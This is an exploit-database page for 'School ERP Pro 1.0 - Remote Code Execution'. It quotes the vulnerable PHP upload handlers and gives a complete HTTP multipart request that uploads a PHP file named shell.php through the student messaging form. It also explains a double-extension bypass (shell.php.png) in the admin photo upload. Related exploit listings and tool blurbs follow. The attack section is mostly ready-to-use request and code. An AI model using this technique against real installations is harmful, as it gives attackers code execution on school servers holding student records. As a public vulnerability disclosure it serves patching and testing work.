Search for hundreds of thousands of exploits

"School ERP Pro 1.0 - Remote Code Execution"

Author

Exploit author

Besim

Platform

Exploit platform

php

Release date

Exploit published date

2020-04-28

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description
-------------------------------------------
A student can send a message to the admin. Additionally, with this method,
the student can upload a PHP file to the system and run code in the system.

------------------------------------
*Vulnerable code - 1: (for student area) - sendmail.inc.php*
- Student user can send message to admin with the attachment
------------------------------------
$image_file = basename($_FILES['newimage']['name'][$i]);
$ext=explode(".",$_FILES['newimage']['name'][$i]);
$str=date("mdY_hms");
//$t=rand(1, 15);
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
$updir = "images/messagedoc/";
$dest_path = $updir.$new_thumbname;
$up_images[$i] = $dest_path;
$srcfile = $_FILES['newimage']['tmp_name'][$i];
@move_uploaded_file($srcfile, $dest_path);
$ins_arr_prod_images = array(
'`es_messagesid`'  => $id,
'`message_doc`'     => $new_thumbname
);
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);

---------------------------------------------------
*PoC of the Remote Code Execution*
---------------------------------------------------

POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
Content-Type: multipart/form-data;
boundary=---------------------------2104557667975595321153031663
Content-Length: 718
DNT: 1
Connection: close
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
Upgrade-Insecure-Requests: 1

-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="subject"

DEDED
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="message"

<p>DEDED</p>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
Content-Type: text/php

<?php phpinfo(); ?>

-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="filecount[]"

1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="submit_staff"

Send
-----------------------------2104557667975595321153031663--


------------------------------------
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
- Admin user can update user profile photo
------------------------------------
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
$ext = explode(".",$_FILES['pre_image']['name']);
$str = date("mdY_hms");
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$updir = "images/student_photos/";
$uppath = $updir.$new_thumbname;
move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
$file = $new_thumbname;

------------------------------------
Bypass Technique:
------------------------------------

$_FILES['pre_image']['name']; --- > shell.php.png
$ext = explode(".",$_FILES['pre_image']['name']);
---
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$ext[0] --> shell
$ext[1] --> php
lastfilename --> st_date_shell.php
Release DateTitleTypePlatformAuthor
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
2020-09-03"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)"webappsphpV1n1v131r4
Release DateTitleTypePlatformAuthor
2020-05-12"qdPM 9.1 - Arbitrary File Upload"webappsphpBesim
2020-05-11"CuteNews 2.1.2 - Arbitrary File Deletion"webappsphpBesim
2020-05-06"Booked Scheduler 2.7.7 - Authenticated Directory Traversal"webappsphpBesim
2020-05-06"webTareas 2.0.p8 - Arbitrary File Deletion"webappsphpBesim
2020-05-06"i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion"webappsphpBesim
2020-05-05"PhreeBooks ERP 5.2.5 - Remote Command Execution"webappsphpBesim
2020-05-05"webERP 4.15.1 - Unauthenticated Backup File Access"webappsphpBesim
2020-04-29"School ERP Pro 1.0 - Arbitrary File Read"webappsphpBesim
2020-04-28"School ERP Pro 1.0 - Remote Code Execution"webappsphpBesim
2020-04-28"School ERP Pro 1.0 - 'es_messagesid' SQL Injection"webappsphpBesim
2020-04-27"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)"webappsphpBesim
2020-04-27"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak"webappshardwareBesim
2020-04-27"Netis E1+ 1.2.32533 - Backdoor Account (root)"webappshardwareBesim
2020-04-27"PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload"webappsphpBesim
2020-04-24"Edimax EW-7438RPn 1.13 - Remote Code Execution"webappshardwareBesim
2020-04-24"EspoCRM 5.8.5 - Privilege Escalation"webappsmultipleBesim
2020-04-23"User Management System 2.0 - Authentication Bypass"webappsphpBesim
2020-04-23"User Management System 2.0 - Persistent Cross-Site Scripting"webappsphpBesim
2020-04-23"Complaint Management System 4.2 - Persistent Cross-Site Scripting"webappsphpBesim
2020-04-23"Complaint Management System 4.2 - Authentication Bypass"webappsphpBesim
2020-04-23"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)"webappsphpBesim
2020-04-22"Edimax EW-7438RPn - Information Disclosure (WiFi Password)"webappshardwareBesim
2020-04-22"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)"webappshardwareBesim
2016-10-31"S9Y Serendipity 2.0.4 - Cross-Site Scripting"webappsphpBesim
2016-10-23"Zenbership 107 - Multiple Vulnerabilities"webappsphpBesim
2016-10-19"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload"webappsphpBesim
2016-10-13"Colorful Blog - Persistent Cross-Site Scripting"webappsphpBesim
2016-10-13"Thatware 0.4.6 - SQL Injection"webappsphpBesim
2016-10-13"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)"webappsphpBesim
2016-10-13"JonhCMS 4.5.1 - SQL Injection"webappsphpBesim
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48392/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.